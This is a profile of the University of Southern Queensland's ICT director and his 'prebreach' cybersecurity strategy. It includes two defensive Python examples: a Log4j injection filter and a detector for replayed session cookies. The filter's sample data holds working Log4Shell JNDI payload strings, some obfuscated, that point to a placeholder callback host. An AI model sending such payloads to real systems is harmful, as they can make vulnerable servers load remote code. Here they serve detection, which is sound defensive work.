University of Southern Queensland
Name: Scott Sorley
Title: Executive director ICT services
Company: University of Southern Queensland
Commenced role: October 2010
Reporting line: Deputy vice chancellor (Enterprise Services)
Member of the executive team: Member of senior leadership group
Technology Function: 120 staff, 5 direct reports
The cyber investment approach at the University of Southern Queensland resembles the “Precrime” division in the movie “Minority Report” – intercepting criminal activity just before it occurs, according to executive director ICT services, Scott Sorley.
A “prebreach” approach
“Our ‘prebreach’ approach deploys resources using high probability, evidence-based intelligence, predicting and focussing on where a breach attempt is imminent,” Sorley tells CIO Australia.
This contrasts with non-contextual compliance-based or theoretically based risk approaches, he says.
The university advances cybersecurity practices like “threat intelligence” and “threat hunting” with verified evidence, and uses closed-loop continuous processes – tight OODA (observe, orient, decide, act) loops – that significantly increase their impact and utility, says Sorley.
This “prebreach” approach protects four commonly exploited attack surfaces – the organisational network or digital perimeter, applications, identities and internal systems.
“We monitor networks where hackers operate, scrutinising accesses from these locations through algorithms that detect ‘risky’ behaviour,” says Sorley.
“We track new application vulnerabilities before they become public and implement compensating mitigating controls while waiting for patches.”
Sorley’s team also gathers stolen identities and session information from the marketplaces hackers use to trade access, and uses honeypot-like deception technology to detect high-risk behaviour within the organisation. This provides high-fidelity information on inappropriate access attempts or scans, with almost no false positives.
Shift from impact to likelihood
“A fundamental shift from impact to likelihood, in risk terms, constitutes our most significant innovation,” says Sorley.
Traditional risk concepts apply poorly to cybersecurity, he says: a high-likelihood but low-impact breach that goes undetected can rapidly become high impact through privilege escalation, lateral movement or contagion.
“Our parallel innovation involves the targeted, coordinated application of fringe technology, redirecting investment from lower value activities and reaping savings and risk avoidance.”
While the university still performs compliance and risk-based activities, these don’t deliver the highest value in protecting the organisation from cyber breaches, says Sorley.
“Innovative intelligence-based cybersecurity enhances compliance and risk approaches, yielding optimal defence while remaining organisationally defensible.”
This ‘prebreach’ approach emerged after evaluating the efficacy of cybersecurity controls, audit feedback and compliance activities, says Sorley.
“It became evident that compliance efforts were a useful baseline but lacked relevance for many contemporary cyber-attacks.”
Meanwhile, even though data collection and security information and event management (SIEM) systems do provide valuable insights for reactive incident response, this data is historical.
“The cybersecurity landscape demands a proactive, anticipatory approach,” says Sorley.
“Compliance and general protections alone are insufficient in the face of agile and adaptive attackers. To address this, we recognised the need to focus on anticipating attacks, reducing noise, and redirecting our resources towards preventing high likelihood attacks.”
Specific threat intelligence
To achieve this, the organisation turned to better general and specific threat intelligence, refining it until it was able to automate protective or mitigating action directly from the intelligence.
“This has resulted in high fidelity intelligence-informed proactive and predictive cyber security for our perimeter, application, and identity attack surfaces, which has repeatedly saved us from breaches,” says Sorley.
“Through rigorous post-breach analysis of other organisations, we have observed the same attack methods used against us, but our approach effectively mitigated them before we were targeted.”
“Our success demonstrates the value of anticipating and mitigating attacks earlier in their lifecycle, rather than relying solely on historical data and non-contextual advice.”
For example, the university identified and blocked attempts to exploit zero-day vulnerabilities in Microsoft Exchange, preventing compromise, because attackers had used the same source locations to launch earlier, unsuccessful attacks. Log4j zero-day attacks were also intercepted using application firewalls well before the vulnerability was officially announced.
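Intercepting Log4j-style payloads at an application firewall, as described above, comes down to a pattern check on inbound request fields that survives the obfuscation attackers used. The following is an added example written for this article, not the university’s rule set: a small Python check that percent-decodes request fields, collapses the nested `${lower:...}` and `${...:-x}` lookups that were used to disguise the `jndi:` string, and then flags the request. The sample requests and the 203.0.113.7 callback host are constructed (documentation address space).

```python
import re
import urllib.parse

# Constructed sample requests, not captured traffic. 203.0.113.0/24 is
# documentation address space; the callback host is a placeholder.
SAMPLE_REQUESTS = [
    ("GET", "/search?q=laptops", {"User-Agent": "Mozilla/5.0"}),
    ("GET", "/", {"User-Agent": "${jndi:ldap://203.0.113.7:1389/a}"}),
    ("GET", "/login", {"X-Api-Version": "${${lower:j}ndi:${::-l}dap://203.0.113.7/x}"}),
    ("POST", "/api/v1/items?name=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fy%7D",
     {"User-Agent": "curl/8.0"}),
    ("GET", "/health", {"User-Agent": "${env:HOME}"}),
]

# Innermost ${...} lookup, i.e. one with no nested braces inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Evaluate the Log4j lookup forms used to hide the string 'jndi':
    ${lower:J} / ${upper:j} and the default-value form ${anything:-j}.
    Anything else (including jndi: itself) is returned unchanged."""
    if ":-" in token:
        return token.split(":-", 1)[1]
    head, sep, rest = token.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    return "${" + token + "}"


def normalise(value: str, rounds: int = 6) -> str:
    """Percent-decode and collapse nested lookups until the value stops changing.
    The round limit bounds the work done on hostile input."""
    for _ in range(rounds):
        before = value
        value = urllib.parse.unquote(value)
        value = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), value)
        if value == before:
            break
    return value


def inspect_request(method, path, headers):
    """Return [(field, normalised value)] for every field carrying a JNDI lookup."""
    fields = {"path": path}
    fields.update({"header:" + k: v for k, v in headers.items()})
    hits = []
    for field, raw in fields.items():
        norm = normalise(raw)
        if JNDI_LOOKUP.search(norm):
            hits.append((field, norm))
    return hits


def filter_requests(requests):
    """Return the requests a WAF rule built on inspect_request would block."""
    blocked = []
    for method, path, headers in requests:
        hits = inspect_request(method, path, headers)
        if hits:
            blocked.append((method, path, hits))
    return blocked


if __name__ == "__main__":
    for method, path, hits in filter_requests(SAMPLE_REQUESTS):
        print("BLOCK", method, path, hits)
```

Three of the five constructed requests are blocked; the plain `${env:HOME}` probe is not, because the rule targets the `jndi:` lookup specifically. A real deployment would inspect bodies and every header, not only the fields shown, and would log the normalised value alongside the raw one so analysts can see what the attacker actually sent.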
“Many organisations were unfortunately breached as the patches were poor and vendors took time to declare their use of the library and patch,” says Sorley.
“We modified our compromised account process to identify session cookie reuse from multiple locations and to kill all active sessions on compromised accounts, mitigating the use of ‘stealer’ malware that stealthily steals session cookies bypassing MFA.”
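As an added illustration of the session-cookie reuse check Sorley describes here, and of the scrutiny of accesses from networks where hackers operate mentioned earlier, the following example was written for this article and is not the university’s own process. It flags a session cookie seen from two locations less than an hour apart, or presented from a network on a threat-intelligence list, and then revokes every session of the affected user rather than only the abused cookie. The log lines, the prefix-to-location table, the risky-network list and the one-hour window are constructed assumptions; a production version would use a GeoIP/ASN database and the identity provider’s session revocation API.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed stand-in for a GeoIP/ASN lookup, keyed on documentation address space.
LOCATION_BY_PREFIX = {
    "203.0.113.0/24": "campus",
    "198.51.100.0/24": "residential-isp",
    "192.0.2.0/24": "hosting-provider",
}
# Constructed threat-intelligence feed: networks observed hosting attacker tooling.
RISKY_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]

# Assumption: two sightings of one cookie from different locations less than an
# hour apart cannot be the same laptop moving, so they indicate a replayed cookie.
REUSE_WINDOW = timedelta(minutes=60)

# Constructed authenticated-request log: (timestamp, user, session cookie id, source ip).
EVENTS = [
    ("2024-03-01T09:00:00", "alice", "sess-a1", "203.0.113.10"),
    ("2024-03-01T09:05:00", "alice", "sess-a1", "203.0.113.11"),  # same site, fine
    ("2024-03-01T09:20:00", "alice", "sess-a1", "192.0.2.50"),    # same cookie, replayed elsewhere
    ("2024-03-01T09:30:00", "alice", "sess-a2", "198.51.100.5"),  # alice's other session
    ("2024-03-01T10:00:00", "bob", "sess-b1", "198.51.100.20"),
    ("2024-03-01T18:00:00", "bob", "sess-b1", "203.0.113.40"),    # 8 h later: a commute, not a replay
    ("2024-03-01T11:00:00", "carol", "sess-c1", "192.0.2.9"),     # straight from a risky network
]


def location_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for prefix, label in LOCATION_BY_PREFIX.items():
        if addr in ipaddress.ip_network(prefix):
            return label
    return "unknown"


def from_risky_network(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RISKY_NETWORKS)


def detect_compromised(events):
    """Return {user: [reasons]} for accounts whose session cookie was seen from two
    locations inside REUSE_WINDOW, or presented from a risky network at all."""
    by_session = defaultdict(list)
    for ts, user, sid, ip in events:
        by_session[(user, sid)].append((datetime.fromisoformat(ts), ip))

    flagged = defaultdict(list)
    for (user, sid), rows in by_session.items():
        rows.sort()  # the log is not guaranteed to arrive in time order
        for i, (ts, ip) in enumerate(rows):
            if from_risky_network(ip):
                flagged[user].append(f"{sid} presented from risky network {ip}")
            if i == 0:
                continue
            prev_ts, prev_ip = rows[i - 1]
            here, there = location_of(ip), location_of(prev_ip)
            if here != there and ts - prev_ts <= REUSE_WINDOW:
                flagged[user].append(
                    f"{sid} reused from {there} and {here} within {ts - prev_ts}")
    return dict(flagged)


def revoke_all_sessions(events, flagged):
    """Kill every session of a flagged user, not just the abused cookie: the
    attacker holding one stolen cookie may already have minted others."""
    revoked = defaultdict(set)
    for _, user, sid, _ in events:
        if user in flagged:
            revoked[user].add(sid)
    return {user: sorted(sids) for user, sids in revoked.items()}


if __name__ == "__main__":
    flagged = detect_compromised(EVENTS)
    for user, reasons in flagged.items():
        print(user, reasons)
    print("revoke:", revoke_all_sessions(EVENTS, flagged))
```

On the constructed log, alice is flagged twice (cookie replayed from a hosting provider within 15 minutes, and that provider is on the risky list), carol once (first sighting already from a risky network), and bob not at all, because his two locations are eight hours apart. The revocation step then invalidates both of alice’s sessions, which is the point of killing all active sessions rather than only the one the detector tripped on.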
Evading business disruptions
Quantifying the value of this approach is a complex task, says Sorley.
“As a CIO, I can attest to the fact that every month we evade business disruptions and thwart breaches at earlier stages in the attack lifecycle, while utilising comparable or fewer resources than others. These successes serve as a regular tangible reminder of the efficacy of our approach.”
For Sorley, taking a long-term view and consistently delivering has enabled him to see many major projects and strategic initiatives through their entire lifecycle.
“The true measure of success is long-term value, not building a Jenga tower of quick wins,” he says.
“Adopting a long-term view, I remain committed to delivering results that span the lifecycle of strategic initiatives. Having served in my current role for 12 years, I remain committed to learning and working towards sustained lasting excellence.”
Louis van Wyk